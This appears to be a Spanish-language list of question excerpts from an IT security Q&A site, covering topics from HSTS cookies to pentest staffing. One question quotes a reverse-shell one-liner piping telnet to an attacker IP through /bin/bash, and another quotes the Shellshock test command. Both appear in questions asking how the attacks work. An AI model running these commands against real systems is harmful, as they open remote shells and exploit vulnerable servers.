Todas las preguntas

2
respuestas

Diseño de un modelo de máquina de estado para resolver conflictos de intereses en Seguridad informática

Necesito diseñar un modelo de máquina de estado para resolver el conflicto de intereses en la seguridad informática. [Sé que el modelo de muro chino, pero es un modelo de flujo de información] ¿Existen modelos de este tipo? ¿Alguna razón p...
pregunta 31.01.2012 - 13:13
1
respuesta

¿Cómo prevenir esto 'Intrusion.Win.MSSQL.worm.Helkern'?

A veces, kaspersky Internet Security bloquea este ataque. ¿Qué es esto y cómo puedo prevenirlo / resolverlo para siempre?     
pregunta 29.09.2011 - 10:34
2
respuestas

Formulario de prueba de servicios web de ASMX de Microsoft disponible en máquinas remotas

He estado investigando sobre la seguridad de los servicios web. Me di cuenta de que algunos sitios utilizan Ajax y JQuery para consumir los servicios web de ASMX. Navegué a Web Service EndPoint y me di cuenta de que, desde mi máquina, podía usar...
pregunta 13.01.2012 - 04:37
1
respuesta

¿Qué tan seguros son los iPhone nativos? Servicios PUSH

La aplicación nativa está enviando el UDID al proveedor del servicio para recibir notificaciones automáticas a través de APNS. ¿Cómo es posible evitar que el proveedor de servicios procese las solicitudes manipuladas (UDID modificado)? Escena...
pregunta 19.01.2012 - 06:47
1
respuesta

Pros / Contras del departamento de pentest interno versus pentesters externos

¿Cuáles son las ventajas y desventajas de tener un departamento interno de pentest en una empresa grande en comparación con los proveedores de servicios externos?     
pregunta 13.10.2014 - 19:32
1
respuesta

¿Cómo puede una cookie no segura o no HTTP solamente afectar la seguridad de un sitio web de HSTS?

Si un sitio web se está ejecutando en HSTS y está configurando aproximadamente 20 cookies. De esas 20 cookies, 15 son seguras y solo HTTP y las 5 restantes no lo son. En este escenario, ¿de qué manera podemos comprometer la seguridad del sitio w...
pregunta 30.09.2014 - 05:48
1
respuesta

¿Por qué “() {:;};”?

Quería entender por qué el siguiente código sirve como prueba de concepto para decirme si mi servidor es vulnerable o no. Además, ¿cómo funciona la vulnerabilidad en un nivel inferior? $ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;...
pregunta 02.10.2014 - 12:09
1
respuesta

Mientras esté conectado a Google, etc., ¿puede un sitio malintencionado descubrir mi ID?

Si visité un sitio malicioso al iniciar sesión en Google, Hotmail, Facebook o Twitter en la misma ventana del navegador, ¿qué tan difícil es para el sitio descubrir los ID de mi cuenta sin mi permiso explícito? Supongamos: sistema operati...
pregunta 08.11.2014 - 03:33
3
respuestas

Quiero implementar un nuevo tipo de característica de seguridad en varias plataformas

Quiero crear una función de seguridad que irá más lejos para desalentar a las personas de que busquen en un sistema o servidor seguro que lo que he visto implementado. Específicamente, ¿hay alguna forma (o se ha hecho) de crear una configurac...
pregunta 28.01.2012 - 07:33
1
respuesta

Reversa la puerta trasera de la carcasa

¿Por qué este ejemplo de puerta trasera inversa requiere dos escuchas? El Oyente está usando el comando nc (nc -l). telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b> Aunque el ejemplo a contin...
pregunta 31.10.2014 - 07:57